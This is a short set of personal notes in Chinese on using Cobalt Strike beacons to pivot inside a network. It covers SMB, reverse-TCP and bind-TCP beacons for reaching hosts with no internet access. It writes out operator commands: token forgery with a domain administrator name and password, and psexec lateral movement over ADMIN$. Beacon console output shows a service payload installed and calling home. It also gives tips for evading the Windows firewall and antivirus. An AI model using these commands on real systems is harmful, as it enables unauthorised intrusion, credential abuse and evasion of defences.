前言:自己都記錄一下,免得以后忘記了
SMB Beacon上線:
適用環境:已經有一個跳板機,並且需要滲透的目標無法出網,但是可以和當前的跳板機進行SMB通信
好處:有一定的防止溯源,最大的一個好處就是 規避防火牆的效果
這里說的規避防火牆的效果體現在哪里呢?
答:Windows Defender防火牆不攔截走SMB的流量!
局限性: 只能使用 PsExec 或 Stageless Payload 上線
命令:
rev2self //返回到初始的令牌
make_token pengtest\administrator adexx!@#QWE //偽造令牌
psexec WIN-CKT0M35R6UO ADMIN$ smb //psexec橫向
在理論上可以直接上線,因為Stageless和psexec的原因,無法實現無文件,所以當殺毒存在的時候可能無法上線!
這里說的原因是什么呢?大家可以去了解下Stageless和psexec的實現和原理!
命令流程:
beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 8 bytes
beacon> make_token pengtest\administrator adexx!@#QWE
[*] Tasked beacon to create a token for pengtest\administrator
[+] host called home, sent: 52 bytes
[+] Impersonated PENTEST\yuyonghu01
beacon> psexec WIN-CKT0M35R6UO ADMIN$ smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\WIN-CKT0M35R6UO\pipe\status_7771) on WIN-CKT0M35R6UO via Service Control Manager (\\WIN-CKT0M35R6UO\ADMIN$\c31c12f.exe)
[+] host called home, sent: 219981 bytes
[+] received output:
Started service 8b04b51 on WIN-CKT0M35R6U
unlink 可以暫時斷開和目標 Beacon 的連接,但不會退出進程
link 重新連接回去,兩者都需要在發起連接的 Beacon 上執行,意思就是都是在跳板機上進行操作!
Reverse TCP Beacon上線:
注意: 這個並不能直接在 Listeners 中添加, 需要右鍵已有 Beacon – Pivoting – Listener 添加
然后再生成stageless payload進行橫向,當中如果發現net use 不行的話,記得想起自己很久之前寫的IPC.exe,因為是調用的windows api有一定的規避AV作用!
進行IPC管道連接並且計划任務運行指定程序
還需要知道的unlink命令一旦斷開就無法進行重新連接
Bind TCP Beacon上線:
適用環境:已經有一個跳板機,並且需要滲透的目標無法出網,但是可以和當前的跳板機進行TCP通信
局限性: 因為是 正向連接,只能使用Stageless Payload或者psexec
缺點:盡管在添加監聽端口的時候修改了默認的端口4444為5555,目標主機還是會監聽4444,只能說作者編寫CS的原因了,但是實際上還是可以進行改變的!
connect 重新連接
unlink 斷開通信,但是還是可以重新連接
需要注意:
1、 如果同時在 link 和 connect 同一 Beacon 的機器上上執行 unlink, 兩者就都會被退掉
2、 這個並不能直接在 Listeners 中添加, 需要右鍵已有 Beacon – Pivoting – Listener 添加